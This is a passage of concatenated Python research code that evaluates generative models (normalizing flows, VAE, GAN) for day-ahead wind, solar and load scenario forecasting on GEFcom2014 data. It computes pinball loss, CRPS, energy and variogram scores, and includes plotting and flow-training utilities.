# --------------------------------------------------------------------------------------------------------------
# 2. PLF TEST & VS
# --------------------------------------------------------------------------------------------------------------
plf_list = []
for q in quantiles_list:
plf_list.append(plf_per_quantile(quantiles=q, y_true=y_true))
print('%s PLF TS UMNN %.2f VAE %.2f GAN %.2f RAND %.2f' % (tag, plf_list[0].mean(), plf_list[1].mean(), plf_list[2].mean(), plf_list[3].mean()))
print('')
plf_all_models[tag] = plf_list[:-1]
# --------------------------------------------------------------------------------------------------------------
# 3. Reliability diagram
# --------------------------------------------------------------------------------------------------------------
aq_list = []
for q in quantiles_list:
aq_list.append(compute_reliability(y_true=y_true, y_quantile=q, tag=tag))
aq_all_models[tag] = aq_list[:-1]
mae_list = []
for a in aq_list:
mae_list.append(mean_absolute_error(y_true=np.array(q_set) * 100, y_pred=a))
print('%s MAE TS UMNN %.2f VAE %.2f GAN %.2f RAND %.2f' % (tag, mae_list[0], mae_list[1], mae_list[2], mae_list[3]))
print('')
mae_r_all_models[tag] = mae_list[:-1]
# --------------------------------------------------------------------------------------------------------------
# CRPS
# --------------------------------------------------------------------------------------------------------------
if CRPS:
max_s = 100
crps_list = []
for s in scenarios_list:
crps, crps_d = crps_per_period(scenarios=s, y_true=y_true, max_s=max_s)
crps_list.append(crps)
print('%s CRPS TEST UMNN %.2f VAE %.2f GAN %.2f RAND %.2f' % (tag, 100 * crps_list[0].mean(), 100 * crps_list[1].mean(), 100 * crps_list[2].mean(), 100 * crps_list[3].mean()))
print('')
crps_all_models[tag] = crps_list[:-1]
# --------------------------------------------------------------------------------------------------------------
# PLOTS
# --------------------------------------------------------------------------------------------------------------
"""
Plot the quantile score (PLF = Pinball Loss Function) per quantile on the TEST set of multiple generative models for all tracks.
:param plf: list of the plf_score of multiple generative models. Each element of the list is an array.
"""
x_index = [q for q in range(1, N_q + 1)]
FONTSIZE = 15
plt.figure(figsize=(5, 4))
for l, c in zip(plf_all_models['wind'], colors):
plt.plot(x_index, l, color=c, marker='P', linewidth=2)
for l, c in zip(plf_all_models['load'], colors):
plt.plot(x_index, l, color=c, linestyle="dashed", linewidth=2)
for l, c, lab in zip(plf_all_models['pv'], colors, model_labels):
plt.plot(x_index, l, color=c, label=lab, linewidth=2)
plt.plot(x_index, [-20] * len(x_index), color='k', marker='P', label='wind')
plt.plot(x_index, [-20] * len(x_index), color='k', label='PV')
plt.plot(x_index, [-20] * len(x_index), color='k', linestyle="dashed", label='load')
plt.vlines(x=(N_q + 1) / 2, colors='k', ymin=0, ymax=7)
plt.ylim(0, 7)
plt.xlim(0, N_q + 1)
plt.tick_params(axis='both', labelsize=FONTSIZE)
plt.xticks(ticks=[0, 20, 40, 60, 80, 100])
plt.yticks(ticks=[0, 2, 4, 6])
plt.xlabel('$q$', fontsize=FONTSIZE)
plt.ylabel('%', fontsize=FONTSIZE)
legend = plt.legend(fontsize=1.5*FONTSIZE, ncol=2)
legend.remove()
plt.grid(True)
plt.tight_layout()
plt.savefig(dir_path + 'plf.pdf')
plt.show()
"""
Plot the CRPS on the TEST set of multiple generative models for all tracks.
:param crps: list of the crps scores of multiple generative models. Each element of the list is an array.
"""
if CRPS:
FONTSIZE = 15
plt.figure(figsize=(5, 4))
for l, c in zip(crps_all_models['wind'], colors):
plt.plot(100* l, color=c, marker='P', linewidth=2)
for l, c in zip(crps_all_models['load'], colors):
plt.plot(100* l, color=c, linestyle="dashed", linewidth=2)
for l, c, lab in zip(crps_all_models['pv'], colors, model_labels):
plt.plot(100* l, color=c, label=lab, linewidth=2)
plt.tick_params(axis='both', labelsize=FONTSIZE)
plt.xlabel('Hour', fontsize=FONTSIZE)
plt.ylabel('%', fontsize=FONTSIZE)
plt.xticks([0, 6, 12, 18, 23], ['1', '6', '12', '18', '24'])
plt.yticks(ticks=[0, 2, 4, 6, 8, 10])
legend = plt.legend(fontsize=1.5 * FONTSIZE, ncol=2)
legend.remove()
plt.grid(True)
plt.ylim(0, 12)
plt.xlim(0, 23)
plt.tight_layout()
plt.savefig(dir_path + 'crps.pdf')
plt.show()
"""
Plot the Reliablity diagram per quantile on the TEST set of multiple generative models for all tracks.
:param aq: list of the aq scores of multiple generative models. Each element of the list is an array of shape (n_q,).
"""
FONTSIZE = 15
plt.figure(figsize=(5, 4))
plt.plot(x_index, x_index, 'k', linewidth=2)
for l, c in zip(aq_all_models['wind'], colors):
plt.plot(x_index, l, color=c, marker='P')
for l, c in zip(aq_all_models['load'], colors):
plt.plot(x_index, l, color=c, linestyle="dashed")
for l, c, lab in zip(aq_all_models['pv'], colors, model_labels):
plt.plot(x_index, l, color=c, label=lab)
plt.xlim(0, 100)
plt.ylim(0, 100)
plt.xlabel('$q$', fontsize=FONTSIZE)
plt.tick_params(axis='both', labelsize=FONTSIZE)
# plt.xticks(ticks=[i for i in range(0, 100 + 10, 10)])
# plt.yticks(ticks=[i for i in range(0, 100 + 10, 10)])
plt.xticks(ticks=[0, 20, 40, 60, 80, 100])
plt.yticks(ticks=[0, 20, 40, 60, 80, 100])
plt.ylabel('%', fontsize=FONTSIZE)
legend = plt.legend(fontsize=1.5*FONTSIZE, ncol=2)
legend.remove()
plt.grid(True)
plt.tight_layout()
plt.savefig(dir_path + 'reliability.pdf')
plt.show()
"""
Export only the legend
"""
def export_legend(legend, filename="legend.pdf"):
fig = legend.figure
fig.canvas.draw()
bbox = legend.get_window_extent().transformed(fig.dpi_scale_trans.inverted())
fig.savefig(dir_path + filename, dpi="figure", bbox_inches=bbox)
x_index = [q for q in range(1, N_q + 1)]
FONTSIZE = 15
fig, ax = plt.subplots(1, figsize=(20,20))
plt.plot(x_index, [-20] * len(x_index), color='tab:blue', label='NF', linewidth=2)
plt.plot(x_index, [-20] * len(x_index), color='k', marker='P', label='wind')
plt.plot(x_index, [-20] * len(x_index), color='tab:orange', label='VAE', linewidth=2)
plt.plot(x_index, [-20] * len(x_index), color='k', label='PV')
plt.plot(x_index, [-20] * len(x_index), color='tab:green', label='GAN', linewidth=2)
plt.plot(x_index, [-20] * len(x_index), color='k', linestyle="dashed", label='load')
plt.yticks(ticks=[-20] * len(x_index), labels=" ")
plt.xticks(ticks=x_index, labels=" ")
ax.get_yaxis().set_visible(False)
ax.get_xaxis().set_visible(False)
plt.tick_params(axis='both', labelsize=FONTSIZE)
legend = plt.legend(fontsize=1.5*FONTSIZE, ncol=3)
export_legend(legend)
plt.tight_layout()
plt.show()
x_index = [i for i in range(1, 24+1)]
FONTSIZE = 15
fig, ax = plt.subplots(1, figsize=(20,20))
plt.plot(x_index, [-20] * len(x_index), color='gray', label='scenarios')
plt.plot(x_index, [-20] * len(x_index), color='b', label='10 %')
plt.plot(x_index, [-20] * len(x_index), color='k', label='50 %')
plt.plot(x_index, [-20] * len(x_index), color='g', label='90 %')
plt.plot(x_index, [-20] * len(x_index), color='r', label='obs')
plt.yticks(ticks=[-20] * len(x_index), labels=" ")
plt.xticks(ticks=x_index, labels=" ")
ax.get_yaxis().set_visible(False)
ax.get_xaxis().set_visible(False)
legend = plt.legend(fontsize=1.5*FONTSIZE, ncol=5)
export_legend(legend, filename='legend_scenarios.pdf')
plt.tight_layout()
plt.show()
```
#### File: GEFcom2014/forecast_quality/ES_VS_metrics.py
```python
import math
import os
import pickle
import random
import seaborn as sns
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from GEFcom2014 import read_file
from GEFcom2014 import pv_data, wind_data, load_data, read_file
from GEFcom2014.forecast_quality import compute_DM
def energy_score(s: np.array, y_true: np.array):
"""
Compute the Energy score (ES).
:param s: scenarios of shape (24*n_days, n_s)
:param y_true: observations of shape = (n_days, 24)
:return: the ES per day of the testing set.
"""
n_periods = y_true.shape[1]
n_d = len(y_true) # number of days
n_s = s.shape[1] # number of scenarios per day
es = []
# loop on all days
for d in range(n_d):
# select a day for both the scenarios and observations
s_d = s[n_periods * d:n_periods * (d + 1), :]
y_d = y_true[d, :]
# compute the part of the ES
simple_sum = np.mean([np.linalg.norm(s_d[:, s] - y_d) for s in range(n_s)])
# compute the second part of the ES
double_somme = 0
for i in range(n_s):
for j in range(n_s):
double_somme += np.linalg.norm(s_d[:, i] - s_d[:, j])
double_sum = double_somme / (2 * n_s * n_s)
# ES per day
es_d = simple_sum - double_sum
es.append(es_d)
return es
def variogram_score(s: np.array, y_true: np.array, beta: float):
"""
Compute the Variogram score (VS).
:param s: scenarios of shape (24*n_days, n_s)
:param y_true: observations of shape = (n_days, 24)
:param beta: order of the VS
:return: the VS per day of the testing set.
"""
n_periods = y_true.shape[1]
n_d = len(y_true) # number of days
n_s = s.shape[1] # number of scenarios per day
weights = 1 # equal weights across all hours of the day
vs = []
# loop on all days
for d in range(n_d):
# select a day for both the scenarios and observations
s_d = s[n_periods * d:n_periods * (d + 1), :]
y_d = y_true[d, :]
# Double loop on time periods of the day
vs_d = 0
for k1 in range(n_periods):
for k2 in range(n_periods):
# VS first part
first_part = np.abs(y_d[k1] - y_d[k2]) ** beta
second_part = 0
# Loop on all scenarios to compute VS second part
for i in range(n_s):
second_part += np.abs(s_d[k1, i] - s_d[k2, i]) ** beta
second_part = second_part / n_s
vs_d += weights * (first_part - second_part) ** 2
# VS per day
vs.append(vs_d)
return vs
def plot_DM(p_value: np.array, dir: str, pdf_name: str):
"""
Plot the DM test.
"""
FONTSIZE = 20
plt.figure()
sns.set(font_scale=1.5)
sns_plot = sns.heatmap(100 * p_value, cmap='RdYlGn_r', fmt=".1f", linewidths=0.5, xticklabels=True,
yticklabels=True, annot=False, vmin=0, vmax=10, annot_kws={"size": FONTSIZE})
sns_plot.set_xticklabels(labels=models, rotation='horizontal', fontsize=FONTSIZE)
sns_plot.set_yticklabels(labels=models, rotation=90, fontsize=FONTSIZE)
sns_plot.figure.axes[-1].yaxis.label.set_size(FONTSIZE)
plt.tight_layout()
plt.savefig(dir + pdf_name + '.pdf')
plt.show()
if __name__ == '__main__':
"""
Energy and Variogram scores.
"""
beta = 0.5 # VS order
dir_path = 'export/multivariate_metrics/'
if not os.path.isdir(dir_path): # test if directory exist
os.makedirs(dir_path)
nf_a_id = {'pv': 10,
'wind': 8,
'load': 1}
nf_umnn_id = {'pv': 3,
'wind': 1,
'load': 1}
# ------------------------------------------------------------------------------------------------------------------
# GEFcom IJF_paper case study
# Solar track: 3 zones
# Wind track: 10 zones
# Load track: 1 zones
# 50 days picked randomly per zone for the VS and TEST sets
# ------------------------------------------------------------------------------------------------------------------
es_res = []
vs_res = []
for tag in ['wind', 'pv', 'load']:
if tag == 'pv':
# WARNING: the time periods where PV is always 0 (night hours) are removed -> there are 8 periods removed
# The index of the time periods removed are provided into indices
data, indices = pv_data(path_name='../data/solar_new.csv', test_size=50, random_state=0)
nb_zones = 3
elif tag == 'wind':
data = wind_data(path_name='../data/wind_data_all_zone.csv', test_size=50, random_state=0)
nb_zones = 10
indices = []
elif tag == 'load':
data = load_data(path_name='../data/load_data_track1.csv', test_size=50, random_state=0)
nb_zones = 1
indices = []
df_x_LS = data[0].copy()
df_y_LS = data[1].copy()
df_x_VS = data[2].copy()
df_y_VS = data[3].copy()
df_x_TEST = data[4].copy()
df_y_TEST = data[5].copy()
nb_days_LS = int(len(df_y_LS) /nb_zones)
nb_days_VS = int(len(df_y_VS) /nb_zones )
nb_days_TEST = int(len(df_y_TEST) /nb_zones)
print('#LS %s days #VS %s days # TEST %s days' % (nb_days_LS, nb_days_VS, nb_days_TEST))
# ------------------------------------------------------------------------------------------------------------------
# Rebuilt the PV observations with the removed time periods
# ------------------------------------------------------------------------------------------------------------------
non_null_indexes = list(np.delete(np.asarray([i for i in range(24)]), indices))
if tag == 'pv':
# Rebuilt the PV observations with the removed time periods
df_y_TEST.columns = non_null_indexes
for i in indices:
df_y_TEST[i] = 0
df_y_TEST = df_y_TEST.sort_index(axis=1)
# observations shape = (n_days, 24)
# scenarios shape = (24*n_days, n_s)
s_umnn_TEST = read_file(dir='scenarios/nfs/', name='scenarios_' + tag + '_UMNN_M_' + str(nf_umnn_id[tag]) + '_0_100_TEST')
# s_an_TEST = read_file(dir='scenarios/nfs/', name='scenarios_' + tag + '_AN_M_' + str(nf_a_id[tag]) + '_0_100_TEST')
s_vae_TEST = read_file(dir='scenarios/vae/', name='scenarios_' + tag + '_VAElinear_1_0_100_TEST')
s_gan_TEST = read_file(dir='scenarios/gan/', name='scenarios_' + tag + '_GAN_wasserstein_1_0_100_TEST')
# s_gc_TEST = read_file(dir='scenarios/gc/', name='scenarios_' + tag + '_gc_100_TEST')
s_rand_TEST = read_file(dir='scenarios/random/', name='scenarios_' + tag + '_random_100_TEST')
# models = ['UMNN', 'AN', 'VAE', 'GAN', 'GC', 'RAND']
models = ['NF', 'VAE', 'GAN', 'RAND']
es_res_track = []
vs_res_track = []
for s, m in zip([s_umnn_TEST, s_vae_TEST, s_gan_TEST, s_rand_TEST], models):
es_model = energy_score(s=s, y_true=df_y_TEST.values)
print("%s %s ES: %.2f" %(tag, m, 100 * np.mean(es_model)))
es_res_track.append(100 * np.mean(es_model))
vs_model = variogram_score(s=s, y_true=df_y_TEST.values, beta=beta)
print("%s %s VS: %.2f" %(tag, m, np.mean(vs_model)))
vs_res_track.append(np.mean(vs_model))
# DM test
p_value_es_track = compute_DM(score_l=es_res_track, multivariate=False)
p_value_vs_track = compute_DM(score_l=vs_res_track, multivariate=False)
plot_DM(p_value=p_value_es_track, dir=dir_path, pdf_name=tag + '_ES_DM_test')
plot_DM(p_value=p_value_vs_track, dir=dir_path, pdf_name=tag + '_VS_DM_test')
es_res_track = np.asarray(es_res_track)
vs_res_track = np.asarray(vs_res_track)
es_res.append(es_res_track)
vs_res.append(vs_res_track)
es_res = np.asarray(es_res)
vs_res = np.asarray(vs_res)
```
#### File: GEFcom2014/forecast_quality/utils_clf.py
```python
import math
import os
import pickle
import random
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from GEFcom2014 import pv_data, wind_data, load_data, read_file
def build_true_data(tag: str):
"""
Built the true data on LS, VS, and TEST sets
:param tag: pv, load, wind.
:return: true data into a list.
"""
if tag == 'pv':
# WARNING: the time periods where PV is always 0 (night hours) are removed -> there are 8 periods removed
# The index of the time periods removed are provided into indices
data, indices = pv_data(path_name='../data/solar_new.csv', test_size=50, random_state=0)
elif tag == 'wind':
data = wind_data(path_name='../data/wind_data_all_zone.csv', test_size=50, random_state=0)
indices = []
elif tag == 'load':
data = load_data(path_name='../data/load_data_track1.csv', test_size=50, random_state=0)
indices = []
df_y_LS = data[1].copy()
df_y_VS = data[3].copy()
df_y_TEST = data[5].copy()
non_null_indexes = list(np.delete(np.asarray([i for i in range(24)]), indices))
if tag == 'pv':
# Rebuilt the PV observations with the removed time periods
df_y_LS.columns = non_null_indexes
df_y_TEST.columns = non_null_indexes
df_y_VS.columns = non_null_indexes
for i in indices:
df_y_LS[i] = 0
df_y_VS[i] = 0
df_y_TEST[i] = 0
df_y_LS = df_y_LS.sort_index(axis=1)
df_y_VS = df_y_VS.sort_index(axis=1)
df_y_TEST = df_y_TEST.sort_index(axis=1)
# Add only the zone one-hot encoding feature
if tag == "pv":
x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,-3:].copy()])
x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,-3:].copy()])
x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,-3:].copy()])
elif tag == "wind":
x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,-10:].copy()])
x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,-10:].copy()])
x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,-10:].copy()])
else:
# only one zone for the load track
x_true_LS = df_y_LS.values
x_true_VS = df_y_VS.values
x_true_TEST = df_y_TEST.values
# true value is class 1
# false value is class 0
y_true_LS = np.tile(1, (len(x_true_LS), 1))
y_true_VS = np.tile(1, (len(x_true_VS), 1))
y_true_TEST = np.tile(1, (len(x_true_TEST), 1))
return [x_true_LS, x_true_VS, x_true_TEST, y_true_LS, y_true_VS, y_true_TEST], indices
def build_true_data_cond(tag: str):
"""
Built the true data on LS, VS, and TEST sets
:param tag: pv, load, wind.
:return: true data into a list.
"""
if tag == 'pv':
# WARNING: the time periods where PV is always 0 (night hours) are removed -> there are 8 periods removed
# The index of the time periods removed are provided into indices
data, indices = pv_data(path_name='../data/solar_new.csv', test_size=50, random_state=0)
elif tag == 'wind':
data = wind_data(path_name='../data/wind_data_all_zone.csv', test_size=50, random_state=0)
indices = []
elif tag == 'load':
data = load_data(path_name='../data/load_data_track1.csv', test_size=50, random_state=0)
indices = []
df_y_LS = data[1].copy()
df_y_VS = data[3].copy()
df_y_TEST = data[5].copy()
non_null_indexes = list(np.delete(np.asarray([i for i in range(24)]), indices))
# if tag == 'pv':
# # Rebuilt the PV observations with the removed time periods
# df_y_LS.columns = non_null_indexes
# df_y_TEST.columns = non_null_indexes
# df_y_VS.columns = non_null_indexes
#
# for i in indices:
# df_y_LS[i] = 0
# df_y_VS[i] = 0
# df_y_TEST[i] = 0
# df_y_LS = df_y_LS.sort_index(axis=1)
# df_y_VS = df_y_VS.sort_index(axis=1)
# df_y_TEST = df_y_TEST.sort_index(axis=1)
# Build the x and y of the clf
# if tag == "pv":
# x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,:-3].copy()])
# x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,:-3].copy()])
# x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,:-3].copy()])
# elif tag == "wind":
# x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,:-10].copy()])
# x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,:-10].copy()])
# x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,:-10].copy()])
if tag == "pv":
x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,:].copy()])
x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,:].copy()])
x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,:].copy()])
elif tag == "wind":
x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,:].copy()])
x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,:].copy()])
x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,:].copy()])
else:
x_true_LS = np.hstack([df_y_LS.values, data[0].values[:,:].copy()])
x_true_VS = np.hstack([df_y_VS.values, data[2].values[:,:].copy()])
x_true_TEST = np.hstack([df_y_TEST.values, data[4].values[:,:].copy()])
# true value is class 1
# false value is class 0
y_true_LS = np.tile(1, (len(x_true_LS), 1))
y_true_VS = np.tile(1, (len(x_true_VS), 1))
y_true_TEST = np.tile(1, (len(x_true_TEST), 1))
# Check shape of data
# x_true shape should be LS/VS/TEST
# PV: (720*3/50*3/50*3, 16 + 16*5 +3)
# wind: (631*10/50*10/50*10, 24 + 24*10 +10)
# load: (1999/50/50, 24 + 25*5)
return [x_true_LS, x_true_VS, x_true_TEST, y_true_LS, y_true_VS, y_true_TEST], indices
def load_scenarios(dir: str, tag:str, name: str, i_clf:int=0):
"""
Load the ith scenario per day on the LS and TEST sets.
:param i_clf: ith scenario.
"""
if tag == 'load':
n_zones = 1
ls_size = 1999 # days / zone
elif tag == 'pv':
n_zones = 3
ls_size = 720 # days / zone
elif tag == 'wind':
n_zones = 10
ls_size = 631 # days / zone
# pick only one scenario per day
# scenarios are into array of shape (24*n_days*_n_zone, n_s) with n_periods = 24*n_days*_n_zone
s_model_temp = read_file(dir=dir, name='scenarios_' + tag + name+'_LS')
n_days = int(s_model_temp.shape[0]/24)
if len(s_model_temp) != int(24*ls_size*n_zones):
print('WARNING with #LS')
print(len(s_model_temp))
s_model_ls = s_model_temp[:, i_clf].reshape(n_days, 24) # (n_days*_n_zone, 24)
s_model_temp = read_file(dir=dir, name='scenarios_' + tag + name+'_TEST')
n_days = int(s_model_temp.shape[0]/24)
if len(s_model_temp) != int(24*50*n_zones):
print('WARNING with #TEST')
print(len(s_model_temp))
s_model_test = s_model_temp[:, i_clf].reshape(n_days, 24) # (n_days*_n_zone, 24)
# (n_days*_n_zone, 24)
return s_model_ls, s_model_test
def build_data_eval(true_data:list, model: str, tag: str, i_clf:int=0):
"""
Build the data for scenario evaluation using a classifier.
:param model:
:param tag:
:return:
"""
x_true_LS, x_true_VS, x_true_TEST, y_true_LS, y_true_VS, y_true_TEST = true_data
# ------------------------------------------------------------------------------------------------------------------
# 2. Load the scenarios
# ------------------------------------------------------------------------------------------------------------------
# load x_false -> scenarios
# (n_days*_n_zone, 24)
nf_a_id = {'pv': 10,
'wind': 8,
'load': 1}
nf_umnn_id = {'pv': 3,
'wind': 1,
'load': 1}
if model == 'NF-UMNN':
# print(tag, nf_umnn_id[tag])
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/nfs/', tag=tag, name='_UMNN_M_' + str(nf_umnn_id[tag]) + '_0_100', i_clf=i_clf)
elif model == 'NF-A':
# print(tag, nf_a_id[tag])
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/nfs/', tag=tag, name='_AN_M_' + str(nf_a_id[tag]) + '_0_100', i_clf=i_clf)
elif model == 'VAE':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/vae/', tag=tag, name='_VAElinear_1_0_100', i_clf=i_clf)
elif model == 'GAN':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/gan/', tag=tag, name='_GAN_wasserstein_1_0_100', i_clf=i_clf)
elif model == 'GC':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/gc/', tag=tag, name='_gc_100', i_clf=i_clf)
elif model == 'RAND':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/random/', tag=tag, name='_random_100', i_clf=i_clf)
if tag == 'pv':
n_zones = 3
# Add the zone one-hot encoding
x_false_LS = np.hstack([x_false_LS, x_true_LS[:, -n_zones:]])
x_false_TEST = np.hstack([x_false_TEST, x_true_TEST[:, -n_zones:]])
elif tag == 'wind':
n_zones = 10
# Add the zone one-hot encoding
x_false_LS = np.hstack([x_false_LS, x_true_LS[:, -n_zones:]])
x_false_TEST = np.hstack([x_false_TEST, x_true_TEST[:, -n_zones:]])
# 3. Build the dataset for the clf for a given time-series and model
X_LS = np.concatenate((x_false_LS, x_true_LS), axis=0)
X_TEST = np.concatenate((x_false_TEST, x_true_TEST), axis=0)
# true value is class 1
# false value is class 0
y_false_LS = np.tile([0], (len(x_false_LS), 1))
y_false_TEST = np.tile([0], (len(x_false_TEST), 1))
y_LS = np.concatenate((y_false_LS, y_true_LS), axis=0)
y_TEST = np.concatenate((y_false_TEST, y_true_TEST), axis=0)
# 4. Build & fit the clf
X_LS = [X_LS, x_false_LS, x_true_LS]
X_TEST = [X_TEST, x_false_TEST, x_true_TEST]
y_LS = [y_LS.reshape(-1), y_false_LS.reshape(-1), y_true_LS.reshape(-1)]
y_TEST = [y_TEST.reshape(-1), y_false_TEST.reshape(-1), y_true_TEST.reshape(-1)]
return X_LS, y_LS, X_TEST, y_TEST
def build_data_eval_cond(true_data:list, model: str, tag: str, pv_indices:np.array, i_clf:int=0):
"""
Build the data for scenario evaluation using a classifier.
:param model:
:param tag:
:return:
"""
x_true_LS, x_true_VS, x_true_TEST, y_true_LS, y_true_VS, y_true_TEST = true_data
# ------------------------------------------------------------------------------------------------------------------
# 2. Load the scenarios
# ------------------------------------------------------------------------------------------------------------------
# load x_false -> scenarios
# (n_days*_n_zone, 24)
nf_a_id = {'pv': 10,
'wind': 8,
'load': 1}
nf_umnn_id = {'pv': 3,
'wind': 1,
'load': 1}
if model == 'NF-UMNN':
# print(tag, nf_umnn_id[tag])
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/nfs/', tag=tag, name='_UMNN_M_' + str(nf_umnn_id[tag]) + '_0_100', i_clf=i_clf)
elif model == 'NF-A':
# print(tag, nf_a_id[tag])
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/nfs/', tag=tag, name='_AN_M_' + str(nf_a_id[tag]) + '_0_100', i_clf=i_clf)
elif model == 'VAE':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/vae/', tag=tag, name='_VAElinear_1_0_100', i_clf=i_clf)
elif model == 'GAN':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/gan/', tag=tag, name='_GAN_wasserstein_1_0_100', i_clf=i_clf)
elif model == 'GC':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/gc/', tag=tag, name='_gc_100', i_clf=i_clf)
elif model == 'RAND':
x_false_LS, x_false_TEST = load_scenarios(dir='scenarios/random/', tag=tag, name='_random_100', i_clf=i_clf)
if tag == 'pv':
x_labels = ['$T$', '$I$', '$I^2$', '$I*T$', '$rh$']
n_zones = 3
# If PV dataset, remove the periods where the PV generation is always 0
x_false_LS = np.delete(x_false_LS, pv_indices, axis=1)
x_false_TEST = np.delete(x_false_TEST, pv_indices, axis=1)
elif tag == 'wind':
x_labels = ['$u^{10}$', '$v^{100}$', '$v^{10}$', '$v^{100}$', '$ws^{10}$', '$ws^{100}$', '$we^{10}$', '$we^{100}$', '$wd^{10}$', '$wd^{100}$']
n_zones = 10
elif tag == 'load':
n_f = 25
n_zones = 0
x_labels = ['w_'+str(i) for i in range(1, n_f+1)]
# print("Adding context...")
if tag == "pv":
tt = 24-8
else:
tt = 24
len_feature = len(x_labels)*tt + n_zones
# print("Adding {} features of {}".format(x_true_LS[:,-len_feature:].shape[1], tag))
# Add the context to the scenarios (the context is in x_true); context = weather forecasts + zone one-hot encoding
x_false_LS = np.hstack([x_false_LS, x_true_LS[:,-len_feature:]])
x_false_TEST = np.hstack([x_false_TEST, x_true_TEST[:,-len_feature:]])
# true value is class 1
# false value is class 0
y_false_LS = np.tile([0], (len(x_false_LS), 1))
y_false_TEST = np.tile([0], (len(x_false_TEST), 1))
# 3. Build the dataset for the clf for a given time-series and model
X_LS = np.concatenate((x_false_LS, x_true_LS), axis=0)
X_TEST = np.concatenate((x_false_TEST, x_true_TEST), axis=0)
y_LS = np.concatenate((y_false_LS, y_true_LS), axis=0)
y_TEST = np.concatenate((y_false_TEST, y_true_TEST), axis=0)
X_LS = [X_LS, x_false_LS, x_true_LS]
X_TEST = [X_TEST, x_false_TEST, x_true_TEST]
y_LS = [y_LS.reshape(-1), y_false_LS.reshape(-1), y_true_LS.reshape(-1)]
y_TEST = [y_TEST.reshape(-1), y_false_TEST.reshape(-1), y_true_TEST.reshape(-1)]
# check shapes
# X_LS, X_TEST should have shapes as follows:
# PV: (#LS *2 or #TEST *2, 16 + 16 * 5 +3)
# wind: (#LS *2 or #TEST *2, 24 + 24 * 10 +10)
# load: (#LS *2 or #TEST *2, 24 + 24 * 25)
return X_LS, y_LS, X_TEST, y_TEST
if __name__ == "__main__":
# Set the working directory to the root of the project
print(os.getcwd())
```
#### File: models/NFs/utils_NFs.py
```python
import math
import os
import torch
import random
import wandb
import pandas as pd
import numpy as np
from timeit import default_timer as timer
from sklearn.utils import shuffle
def build_nfs_scenarios(n_s: int, x: np.array, y_scaler, flow, conditioner_args, max:int=1, gpu:bool=True, tag:str= 'pv', non_null_indexes:list=[]):
"""
Build scenarios for a NFs multi-output.
Scenarios are generated into an array (n_periods, n_s) where n_periods = 24 * n_days
:return: scenarios (n_periods, n_s)
"""
# to assign the data to GPU with .to(device) on the data
if gpu:
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
else:
device = "cpu"
flow.to(device)
if tag == 'pv':
n_periods_before = non_null_indexes[0]
n_periods_after = 24 - non_null_indexes[-1] - 1
print(n_periods_after, n_periods_before)
n_days = len(x)
nb_output, cond_in = conditioner_args['in_size'], conditioner_args['cond_in']
time_tot = 0.
scenarios = []
for i in range(n_days):
start = timer()
# sample nb_scenarios per day
predictions = flow.invert(z=torch.randn(n_s, nb_output).to(device), context=torch.tensor(np.tile(x[i, :], n_s).reshape(n_s, cond_in)).to(device).float()).cpu().detach().numpy()
predictions = y_scaler.inverse_transform(predictions)
# corrections -> genereration is always > 0 and < max capacity
predictions[predictions < 0] = 0
predictions[predictions > max] = max
if tag == 'pv':
# fill time period where PV is not 0 are given by non_null_indexes
# for instance it could be [4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
# then it is needed to add 0 for periods [0, 1, 2, 3] and [20, 21, 22, 23]
scenarios_tmp = np.concatenate((np.zeros((predictions.shape[0], n_periods_before)), predictions, np.zeros((predictions.shape[0], n_periods_after))), axis=1) # shape = (n_s, 24)
else:
scenarios_tmp = predictions
scenarios.append(scenarios_tmp.transpose()) # list of arrays of shape (24, n_s)
end = timer()
time_tot += end - start
print("day {:.0f} Approximate time left : {:2f} min".format(i, time_tot / (i + 1) * (n_days - (i + 1))/60), end="\r",flush=True)
# if i % 20 == 0:
# print("day {:.0f} Approximate time left : {:2f} min".format(i, time_tot / (i + 1) * (nb_days - (i + 1)) / 60))
print('Scenario generation time_tot %.1f min' % (time_tot / 60))
return np.concatenate(scenarios,axis=0) # shape = (24*n_days, n_s)
def fit_NF(nb_epoch: int, x_LS: np.array, y_LS: np.array, x_VS: np.array, y_VS: np.array, x_TEST: np.array, y_TEST: np.array, flow, opt, batch_size:int=100, wdb:bool=False, gpu:bool=True):
"""
Fit the NF.
"""
# to assign the data to GPU with .to(device) on the data
if gpu:
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
else:
device = "cpu"
flow.to(device)
loss_list = []
time_tot = 0.
best_flow = flow
# WARNING: batch size = 10 % #LS
batch_size = int(0.1 * y_LS.shape[0])
for epoch in range(nb_epoch):
loss_tot = 0
start = timer()
# Shuffle the data randomly at each epoch
seed = random.randint(0, 2000)
x_LS_shuffled, y_LS_shuffled = shuffle(x_LS, y_LS, random_state=seed)
# batch of 100 days
# WARNING: if the NFs is single output, batch_size must be = 100 * 24 !!!
i = 0
loss_batch = 0
